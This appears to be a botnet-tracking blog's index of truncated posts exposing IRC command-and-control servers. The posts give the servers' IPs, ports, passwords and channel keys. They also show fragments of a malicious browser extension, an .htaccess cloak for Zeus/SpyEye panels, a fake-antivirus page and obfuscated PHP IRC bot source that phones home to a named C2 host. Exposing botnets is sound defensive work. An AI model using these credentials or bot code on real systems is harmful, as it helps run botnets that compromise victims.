Another post from our anonymous friend
Resolved : [4thdemo.com] To [199.19.105.123]
server port password channel
4thdemo.com:3344 785chelsea #Insomnia
4thdemo.com:5443 alexandre69 #Channel Password
4thdemo.com:6667 r3m0hdemoni #Insomnia r3de07, #Jamie
4thdemo.com:9891 modrica1x1 #MasterBl4ster modricha1x1, #lolba, #Cro4t, #fric
All are separate IRC servers, but hosted on the same server. Some HF hecker selling to skids. Oh, it's DeMoNi *
Read more...
insomnia.incorporatedhosting.info (Insomnia bot hosted in United Kingdom Ovh Systems)
This botnet was found by our anonymous friend here; all credits go to him for this.
Server Port insomnia.incorporatedhosting.info:5656
Channel: #insomnia k6geyzs
Botnet owner: Digital from HF and friends Here
Lilyjade extension named Ad Killer Pro (found from our anonymous friend)
//New Lilyjade extension
//Named: Ad Killer Pro
//CrosRider #:4995
//Panel: http://nemsmedia.cloudapp.net
//Extension
appAPI.ready(function($) {
Read more...
Anti ZS spyeyes Tracker .htaccess
Criminals are now forced to find different methods to protect malware like Zeus or SpyEye from being traced and exposed. This is one of them:
############################
#Anti ZS spyeyes Tracker .htaccess #
#84.74.14?.* #
############################
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^http://.*google.com [NC]
RewriteRule .* - [F]
###########################################
#Spider Blocker/Crawler/Bot's #
###########################################
Order Deny,Allow
Deny from 82.165.47.*
Read more...
Remember h1t3m? lol
Some of u heckers prob remember h1t3m, the Australian guy who got caught and sent to prison for infecting like 3k people. I found some nice logs, and as u can see it was not so hard to find him. He even told his real name to buyers who wanted to buy his spack have
Read more...
xlaazer.no-ip.info (irc botnet hosted in United States Goose Creek Comcast Cable Communications Inc)
Resolved : [xlaazer.no-ip.info] To [76.23.217.80]
Remote Host Port Number
xlaazer.no-ip.info 8080 PASS none
Clients: I have 91 clients and 0 servers
Local users: Current Local Users: 91 Max: 1522
Global users: Current Global Users: 91 Max: 296
I don't have the exe file to find channels.
Hosting info: http://whois.domaintools.com/76.23.217.80
b4nb1n0.dyndns.tv (ngrBot hosted in Spain Ovh Systems)
Domains used for controlling the botnet:
b4nb1n0.dyndns.tv active
d11.dyndns.tv
0csf15.dyndns.tv
Resolved : [b4nb1n0.dyndns.tv] To [178.33.116.27]
server: b4nb1n0.dyndns.tv PASS b4nb1
Local users: Current Local Users: 82 Max: 92
Global users: Current Global Users: 82 Max: 92
NICK n{USA|XPa}hrczwsa
USER hrczwsa 0 0 :hrczwsa
JOIN #hola juli26
Now talking in #hola
Modes On: [ #hola ] [
Read more...
Fake Antivirus Example
The html file is encrypted; u have to decrypt the encrypted (base64) part. If u want to have more from this malware, open the html file in Sandboxie to see what it does.
virtest.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Wait a minute! This is important - we check your devices.</title>
<meta http-equiv="Content-Type" content="text/html;
Read more...
91.121.171.64 (irc botnet hosted in France Ovh Systems)
ip:port 91.121.171.64:9040
nick xUVEuwU
user cjfsiemx
channel #j
channel #c
channel #m
Now talking in #j
Topic On: [ #j ] [ =KN4iPk89Ohci3Sn1FY5LY8datYLj+i4PAPQuBzYYTyPX97LYmPrRD9RhXU0Gj5Kp5qfZU6LVVw90Ax ]
Topic By: [ y ]
Now talking in #c
Topic On: [ #c ] [ =qZw7/pkZ+h/Oi7VdGwYNa63Gdfp77grj2Awm4eqQ+xsz+tuggMYRZyQXWSVqN+7dBpeSdeEvC1MRGecRP2XBE8Vh/Xl ]
Topic By: [ y ]
UPDATE: 91.121.171.64:4676
Now talking in #balengor
Topic On: [
Read more...
sssssss.devhoster.com (irc botnet hosted in China Beijing Chinanet Hunan Province Network)
Remote Host Port Number
sssssss.devhoster.com 6971 PASS laorosr
UPDATE:
Remote Host Port Number
sssssss.devhoster.com 4030 PASS eee
sssssss.devhoster.com 5060 PASS eee
NICK kmmmxji
USER ygrjllh "" "hkw" :ygrjllh
For more, look here: http://www.exposedbotnets.com/search?q=PASS+laorosr
Hosting info: http://whois.domaintools.com/175.6.1.159
gang.sexpil.net (Linux bots hosted in United States Truckee Softcom America Inc)
Another bot from Tijn
Resolved : [gang.sexpil.net] To [216.224.184.101]
<?php
@set_time_limit(0);
@error_reporting(0);
class HbZheTqekEkqwtqTQ {
var $ttwtzTtWQWwhzbN = array("BbWEWnHeTTwqnNhb"=>"gang.sexpil.net", "eBwz"=>"23232", "ZnQWe"=>"scary", "KqkktZ"=>"13", "KtWqnhZ"=>"#wWw#", "tZQ"=>"scan", "NneBweEZz"=>"41aa15390e2efa34ac693c3bd7cb8e88", "eWNTTTEhbQ"=>".", "BbzWWQkbNBb"=>"a87710e60dee7645081a8fc2fab74dbd");
var $users = array();
/* txZET4EZRnuKkWrlW8MjP0M46fREwjEPHtjqoOf51zFbmWn9VZiBQVvM0chmmL2T5c9jQffIFLK */
function yySydpvYj($host) { $this->users[$host] = true; }
function SjSpsYm($msg) { fwrite($this->rIiuOioIR,"$msgrn"); }
function aGGAJSAgavgjADGa() {
$chars = 'abcdefghijklmnopqrstuvwxyz_ABCDEFGHIJKLMNOPQRSTUVWXYZ-0123456789';
$size = strlen($chars);
Read more...